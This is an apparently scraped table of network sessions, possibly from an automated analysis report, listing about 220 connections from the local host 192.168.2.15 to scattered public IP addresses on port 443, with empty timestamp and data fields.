                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20731192.168.2.1551054201.211.210.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20732192.168.2.1550998148.189.239.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20733192.168.2.156023047.157.253.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20734192.168.2.153350435.215.227.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20735192.168.2.155823625.168.233.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20736192.168.2.155002025.82.26.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20737192.168.2.1540840132.10.7.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20738192.168.2.1544016218.239.194.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20739192.168.2.1542814129.204.36.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20740192.168.2.153809062.155.132.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20741192.168.2.153336090.116.202.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20742192.168.2.1553798129.27.72.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20743192.168.2.1547670221.179.133.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20744192.168.2.155096089.238.64.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20745192.168.2.155934274.190.246.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20746192.168.2.15508768.100.244.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20747192.168.2.1553224177.212.114.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20748192.168.2.155828037.254.238.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20749192.168.2.1549600221.206.98.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20750192.168.2.153279825.76.172.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20751192.168.2.1538708176.30.189.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20752192.168.2.1537002222.215.146.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20753192.168.2.1552020190.180.45.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20754192.168.2.154678239.173.30.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20755192.168.2.1550322137.109.221.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20756192.168.2.1555754143.252.145.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20757192.168.2.155065294.149.101.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20758192.168.2.1545398165.5.95.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20759192.168.2.1537530169.249.14.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20760192.168.2.154348865.196.73.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20761192.168.2.154502082.15.128.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20762192.168.2.1543122194.248.144.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20763192.168.2.1536140210.133.47.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20764192.168.2.153479417.226.220.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20765192.168.2.155902049.27.247.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20766192.168.2.1549112149.186.32.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20767192.168.2.1542134174.70.87.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20768192.168.2.154053041.47.201.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20769192.168.2.1544502165.207.31.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20770192.168.2.1550794202.162.162.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20771192.168.2.1549024188.212.162.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20772192.168.2.155046248.44.239.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20773192.168.2.1538580208.15.27.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20774192.168.2.1558534195.135.248.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20775192.168.2.1556686201.40.122.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20776192.168.2.155003027.217.25.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20777192.168.2.153751686.187.169.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20778192.168.2.1555996130.43.229.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20779192.168.2.1544764128.72.75.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20780192.168.2.1537722118.49.78.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20781192.168.2.1556726203.170.227.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20782192.168.2.153638237.206.33.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20783192.168.2.1533224108.39.44.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20784192.168.2.154684842.231.60.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20785192.168.2.154673461.4.104.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20786192.168.2.1535152171.123.243.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20787192.168.2.1548564165.79.153.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20788192.168.2.1538740206.149.150.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20789192.168.2.15548462.78.126.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20790192.168.2.153798891.75.71.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20791192.168.2.154525468.80.251.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20792192.168.2.1549198134.39.90.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20793192.168.2.155929697.236.133.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20794192.168.2.1551090178.92.77.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20795192.168.2.1560676177.134.182.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20796192.168.2.154482614.38.7.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20797192.168.2.1544080155.247.158.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20798192.168.2.1537570201.165.250.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20799192.168.2.1559136132.92.169.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20800192.168.2.155332665.114.10.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20801192.168.2.1551792122.63.246.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20802192.168.2.1541204202.247.206.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20803192.168.2.154645651.55.96.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20804192.168.2.156091813.164.123.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20805192.168.2.155184461.246.242.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20806192.168.2.1560150190.180.70.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20807192.168.2.155601840.90.179.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20808192.168.2.1533594178.51.220.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20809192.168.2.154814689.106.122.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20810192.168.2.1550718194.241.39.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20811192.168.2.1532902180.110.35.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20812192.168.2.1533608152.85.213.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20813192.168.2.1553754213.84.48.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20814192.168.2.155348670.219.237.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20815192.168.2.1550062211.43.90.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20816192.168.2.154552213.34.194.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20817192.168.2.1537110179.149.192.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20818192.168.2.1533700123.106.24.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20819192.168.2.1537532126.24.24.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20820192.168.2.1533646130.37.173.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20821192.168.2.1541104128.237.162.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20822192.168.2.1539876201.169.163.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20823192.168.2.1551602141.190.108.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20824192.168.2.1557594167.30.95.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20825192.168.2.1558808107.208.88.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20826192.168.2.155968477.61.0.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20827192.168.2.15432401.247.180.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20828192.168.2.1558578221.162.218.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20829192.168.2.153299246.4.159.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20830192.168.2.153916024.9.116.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20831192.168.2.1548336140.182.239.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20832192.168.2.15595725.230.159.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20833192.168.2.154003225.8.249.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20834192.168.2.1536312100.255.42.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20835192.168.2.153732668.169.199.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20836192.168.2.1558228196.74.111.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20837192.168.2.154892665.119.74.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20838192.168.2.1557216150.46.167.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20839192.168.2.1541620178.154.104.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20840192.168.2.1549904168.234.103.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20841192.168.2.1549560144.214.91.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20842192.168.2.1556076186.184.94.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20843192.168.2.1543096209.122.235.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20844192.168.2.15392544.232.12.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20845192.168.2.1553374177.9.3.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20846192.168.2.1541422217.0.221.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20847192.168.2.1557334197.50.94.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20848192.168.2.154139084.100.173.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20849192.168.2.1537462142.115.163.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20850192.168.2.155410690.147.161.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20851192.168.2.1554762193.207.149.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20852192.168.2.153501692.2.225.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20853192.168.2.153665239.177.74.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20854192.168.2.1546290172.189.239.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20855192.168.2.1540062196.43.88.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20856192.168.2.1541866104.194.236.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20857192.168.2.154279283.234.41.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20858192.168.2.155419245.215.169.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20859192.168.2.1560306130.125.217.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20860192.168.2.155285663.155.199.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20861192.168.2.1543094194.92.179.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20862192.168.2.1542222217.204.246.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20863192.168.2.1539980207.14.62.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20864192.168.2.1557246205.117.162.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20865192.168.2.154938427.4.66.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20866192.168.2.153308668.155.119.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20867192.168.2.154443280.97.144.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20868192.168.2.154104092.219.22.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20869192.168.2.1546232132.206.228.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20870192.168.2.1541726107.184.126.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20871192.168.2.155833875.154.193.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20872192.168.2.1539128101.206.15.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20873192.168.2.155049670.153.233.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20874192.168.2.1553244131.241.84.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20875192.168.2.1544806107.64.110.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20876192.168.2.1554172119.85.247.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20877192.168.2.154373834.137.107.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20878192.168.2.1543556119.183.65.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20879192.168.2.1546566200.205.139.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20880192.168.2.1534476191.229.229.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20881192.168.2.1554552178.62.146.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20882192.168.2.1537766157.251.65.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20883192.168.2.154170042.41.87.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20884192.168.2.1555626192.14.241.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20885192.168.2.1549982180.20.245.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20886192.168.2.154855280.249.139.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20887192.168.2.153944680.62.183.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20888192.168.2.153837266.150.235.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20889192.168.2.1534538149.194.78.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20890192.168.2.1543108173.61.229.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20891192.168.2.156014251.7.88.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20892192.168.2.1558132105.74.250.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20893192.168.2.1551618125.189.123.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20894192.168.2.1555850171.131.63.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20895192.168.2.1536376171.148.236.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20896192.168.2.1549992211.136.181.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20897192.168.2.1544458136.133.62.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20898192.168.2.1550116196.69.43.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20899192.168.2.1540832173.110.212.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20900192.168.2.1540494189.212.6.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20901192.168.2.1549408178.24.185.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20902192.168.2.15330882.37.223.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20903192.168.2.1543284175.251.201.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20904192.168.2.153625864.217.119.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20905192.168.2.1538608201.217.113.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20906192.168.2.15422904.81.218.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20907192.168.2.153484686.41.181.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20908192.168.2.1549852184.174.216.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20909192.168.2.1556196190.239.122.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20910192.168.2.15429068.221.95.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20911192.168.2.153810452.111.23.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20912192.168.2.1553708196.4.121.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20913192.168.2.1545486169.182.182.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20914192.168.2.154343614.132.225.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20915192.168.2.1546398112.85.46.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20916192.168.2.1548768141.154.186.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20917192.168.2.155312650.36.43.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20918192.168.2.1538390218.145.139.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20919192.168.2.1543328152.3.74.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20920192.168.2.153995632.208.6.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20921192.168.2.1559402131.115.79.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20922192.168.2.1545712157.4.10.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20923192.168.2.1537244151.6.197.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20924192.168.2.1539922120.18.30.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20925192.168.2.1540574129.255.214.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20926192.168.2.153998268.64.145.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20927192.168.2.1541480108.195.48.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20928192.168.2.155442078.240.163.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20929192.168.2.153782847.56.16.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20930192.168.2.154818098.171.248.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20931192.168.2.154069284.227.199.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20932192.168.2.155341885.167.51.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20933192.168.2.155997497.51.161.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20934192.168.2.1556640182.155.176.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20935192.168.2.155002093.144.254.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20936192.168.2.154259878.1.251.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20937192.168.2.153540223.237.87.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20938192.168.2.153593272.182.227.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20939192.168.2.15473904.192.173.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20940192.168.2.1546692167.209.13.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20941192.168.2.155972846.235.13.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20942192.168.2.1558610167.57.212.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20943192.168.2.155130094.231.182.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20944192.168.2.1532886134.114.199.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20945192.168.2.1533620119.109.4.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20946192.168.2.153451034.221.88.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20947192.168.2.1542506178.26.241.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20948192.168.2.1559912140.120.170.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20949192.168.2.1538990210.110.114.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20950192.168.2.154328214.236.185.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20951192.168.2.1539568165.186.78.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
